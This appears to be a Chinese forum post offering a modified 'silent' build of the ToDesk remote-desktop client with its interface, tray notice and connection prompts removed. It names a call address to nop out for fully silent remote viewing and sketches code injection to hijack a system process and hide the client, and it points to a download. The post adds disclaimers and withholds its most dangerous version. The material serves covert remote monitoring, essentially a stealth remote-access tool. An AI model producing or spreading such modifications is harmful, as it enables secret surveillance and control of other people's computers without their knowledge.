ToDesk 4.7.4.3 自改静默版，无界面、无托盘提示、进程隐藏、仅保留后台进程

AI文摘 此内容由AI根据文章内容自动生成

AI Summary

关于安全的说明：

版本1只要远程接入（屏幕右下会出现蜷缩状态的提示窗）或者远程文件传输（有接入提示浮窗）都有提示.

版本2虽然接入没提示，但禁止远程文件传输，静默状态只能用于屏幕远程监控

如果进行远程操控，鼠标移动以及点击等操作，被被控方是能马上看到的.

并且，只要打开任务管理器，在后台进程就能看到软件.

而且，软件得在被控机器上扫码或者设置帐号密码登录才能用，能做到这点就不用考虑安不安全的问题了.

最后，设置了阅读权限以及不直接放出网盘而是通过txt附件上传，软件不会很快扩散。

软件介绍

ToDesk.ori.exe是原版，用于登录和设置

ToDesk.cr1.exe去掉了启动界面和托盘提示。

在【高级设置】>【显示设置】中如上图设置后

远程连接接入时不会弹出界面，但屏幕右边会出现一个非展开状态的状态提示窗口。

在ToDesk.cr1.exe的基础上nop掉call 0x00007FF6CB51EFA0可得到ToDesk.cr2.exe

这个版本远程请求接入时也完全静默，但是nop掉上图中函数不再创建客户端，会导致依赖客户端的文件传输和剪贴板共享失效。

进一步跟进0x00007FF6CB51EFA0函数前后的变化并做对应判断也修改，是可以得到完全静默并支持文件传输和剪贴板共享的版本的，但这个版本太危险，有需要的请自行修改（昨天后面其实实现了更简单的改法，不需要跟进函数来分析）

再进一步注入代码，劫持系统进程，可以把后台进程也隐藏

这个版本很容易被用来做坏事，不做坏事没必要隐藏，所以是绝对不会放出的。

ToDesk.ori.exe、ToDesk.cr1.exe、ToDesk.cr2.exe

下载地址